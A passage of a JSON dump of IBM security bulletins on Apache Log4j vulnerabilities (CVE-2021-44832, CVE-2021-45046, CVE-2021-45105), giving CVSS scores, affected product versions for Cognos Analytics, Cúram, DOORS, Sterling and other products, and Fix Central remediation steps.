Follow the instructions in the iFix for steps on how to remove patches.\n\n2 - The Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Requirements Management DOORS Next (DOORS Next), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management, Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG)** versions **6.0.6, 6.0.6.1, 7.0, 7.0.1** will need to be updated. Follow this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-CLM-ELM&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Link\" ) and apply the remediation.\n\n3 - If the **Engineering Lifecycle Management (ELM)** optional component **mxbean-datacollection (ELMMon)** has been installed for version 7.0.1 or 7.0.2, it will need to be updated. Click this [link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Management&release=All&platform=All&function=fixId&fixids=MXBean-DataCollection-V2&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"link\" ) and follow the instructions to remediate.\n\n4 - **IBM Jazz Reporting Service (JRS)** versions 6.0.6, 6.0.6.1 included an optional technology preview of the property graph solution (<https://jazz.net/pub/new-noteworthy/jrs/6.0.6/6.0.6/index.html#1>). This technology preview is impacted. 
The workaround is to uninstall both the Apache Cassandra - LQE Technology Preview and Elastic Search - LQE Technology Preview components of IBM Jazz Reporting Service. In IBM Installation Manager (IIM), modify packages to uninstall these components.\n\n## Workarounds and Mitigations\n\n[None](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&\\[%E2%80%A6\\]ion&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"None\" )\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T19:58:40", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Management products are vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T19:58:40", "id": "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "href": "https://www.ibm.com/support/pages/node/6540016", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:03", "description": "## Summary\n\nIBM C\u00faram Social Program Management (SPM) uses the Apache Log4j libraries for SPM logging infrastructure. There are publicly known vulnerabilities for Apache Log4j which could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nC\u00faram SPM| 8.0.0.0 - 8.0.1.0 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n_Product_| _VRMF_| _Remediation_ \n---|---|--- \nC\u00faram SPM| 8.0.1.0| Visit IBM Fix Central and upgrade to [8.0.1.0_iFix2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=8.0.1.0&platform=All&function=all> \"8.0.1.0_iFix2\" ) \n \n## Workarounds and Mitigations\n\nBased on current information, no IBM C\u00faram Social Program Management versions before V8 are impacted by the CVE-2021-44228, CVE-2021-45046, CVE-2021-44832, CVE-2021-45105 vulnerabilities. Please refer to this [link](<https://www.ibm.com/support/pages/node/6526676> \"link\" ) for further information.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T10:51:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j may affect C\u00faram Social Program Management (CVE-2021-44832 , CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T10:51:11", "id": "674DDEB58033DAB9D03ED4483C0C1118FD09DBE69E73AD0AAC428EBFC61E2474", "href": "https://www.ibm.com/support/pages/node/6540904", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:54:44", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Analytics has upgraded Apache Log4j to v2.16. This update also addresses CVE-2021-44228. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc., you will access the Interim Fix via the link under Bundled Customers.\n\nAffected Version| Fix Version| Bundled Customers \n---|---|--- \nIBM Cognos Analytics 11.2.x| [IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)| [IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \nIBM Cognos Analytics 11.1.x| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" )| [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4| [IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)| [IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-45046 and CVE-2021-44228 have been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team has developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at Java startup time. It removes the vulnerable JNDI lookup and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" )\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:29:59", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:29:59", "id": "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "href": "https://www.ibm.com/support/pages/node/6528388", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105), which is used by IBM Engineering Lifecycle Optimization - Publishing (PUB) and Rational Publishing Engine (RPE) Knowledge Center for logging. The fix includes an upgrade to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.2 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.1 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0 \nRational Publishing Engine (RPE)| 6.0.6.1 \nRational Publishing Engine (RPE)| 6.0.6 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nThe Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **IBM Engineering Lifecycle Optimization - Publishing (PUB)** (7.0, 7.0.1, 7.0.2) and **Rational Publishing Engine (RPE)** (6.0.6, 6.0.6.1) will need to be updated. Find the version corresponding to your offering, click the link, and follow the instructions to remediate your offering.\n\n * [Rational Publishing Engine (6.0.6)](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6\" )\n * [Rational Publishing Engine (6.0.6.1)](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Rational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6.1&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6.1\" )\n * [IBM Engineering Lifecycle Optimization - Publishing (7.0, 7.0.1, 
7.0.2)](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Optimization+-+Publishing&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM Engineering Lifecycle Optimization - Publishing \\(7.0, 7.0.1, 7.0.2\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T20:44:45", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Optimization - Publishing is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T20:44:45", "id": "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "href": "https://www.ibm.com/support/pages/node/6540672", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:23", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \n \nThe [Fix 
Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:09:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling External Authentication Server (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:09:05", "id": "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "href": "https://www.ibm.com/support/pages/node/6538684", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:28", "description": "## 
Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which affect the Knowledge Center Component (KCCI) that may optionally be installed by IBM Engineering Requirements Management DOORS. This fix upgrades the Knowledge Center component to a version that does not rely on or use Log4j.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Requirements Management DOORS| 9.6.1.7-9.6.1.11, 9.7-9.7.0.1, 9.7.1, 9.7.2-9.7.2.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nNote: This security bulletin supersedes: <https://www.ibm.com/support/pages/node/6527328> \n\n\nThe Knowledge Center Component (KCCI) for a Locally installed Help Server that is (optionally) installed and configured for the following products will need to be updated: \n\n * IBM Engineering Requirements Management DOORS: 9.6.1.7 - 9.6.1.11\n * IBM Engineering Requirements Management DOORS: 9.7 - 9.7.0.1\n * IBM Engineering Requirements Management DOORS: 9.7.1\n * IBM Engineering Requirements Management DOORS: 9.7.2 - 9.7.2.2\n\n \n \n**Remediation/Fixes** \n\n\nClick the [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to download the patch. 
Follow this procedure to remediate.\n\n**Procedure:**\n\n1\\. Download the updated IBM Engineering Requirements Management DOORS Server Windows installer from the link identified above. \n2\\. Unzip the file and install the server setup.exe on a temporary Windows machine. \n3\\. Find the updated KC_CI.zip that is part of the temporary install. \n\\- Temp location: \n\n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\9.7.2.5\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n4\\. Next, update your existing server Windows kcci_install directory: \n\n\\- For IBM Engineering Requirements Management DOORS **9.6.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\<version>\\Server\\ibm\\Rational\\DOORS\\9.6\\kcci_install_ \n\\- For IBM Engineering Requirements Management DOORS **9.7.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\<version>\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n5\\. Delete the old contents of the kcci_install directory. \n6\\. Copy KC_CI.zip (129 MB) version 2.0 into that directory and unzip it.\n\n7\\. Next, click on the KCCI contents [link](<https://download.boulder.ibm.com/ibmdl/pub/software/rationalsdp/documentation/kcci_content/doors_help/> \"link\" ) for the DOORS Help. 
